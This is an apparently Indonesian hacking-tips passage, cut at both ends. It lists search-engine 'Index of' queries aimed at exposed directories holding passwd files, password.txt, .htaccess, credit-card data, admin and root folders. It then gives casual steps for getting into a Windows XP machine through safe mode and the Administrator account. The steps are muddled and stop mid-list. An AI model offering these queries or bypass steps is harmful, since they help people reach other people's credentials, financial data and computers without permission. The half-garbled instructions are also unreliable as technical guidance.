Maka dengan sekejap akan muncul beberapa list link yang mengarah pada
isi suatu direktori tanpa harus melewati halaman web tertentu. Wooow
�.coba aja lagi !

Index of /admin
index of /passwd
Index of /password
Index of /mail
Index of /etc/passwd
Index of /etc/lilo.conf
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"
"Index of/admin.asp
"Index of/login.asp
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"

Bobol password windows xp

Pertama    : Hidupkan kompimu (bahasa gaulnya = komputer)
Kedua    : Jika sudah, tekan F8. Maka kamu akan di bawa ke mode "safe
mode"
             tunggu beberapa menit
Ketiga    : Tekan Ctrl + alt + Del Maka akan muncul form Login dan Password
Keempat    : Isi login dengan Administrator serta passwordnya terserah anda
             pokoknya passwordnya mudah di ingat oleh anda sendiri
Kelima    : Jika telah melakukan hal di atas, restart kembali komputer anda
Keenam    : Pilihlah start in normaly windows kalo ngga salah heheheh
Ketujuh    : Tekan kembali Ctrl + Alt + Del
Kedelapan  : Ketikkan nama loginnya Administrator terus password yang baru anda
     ubah tadi
Kesembilan : Lihat…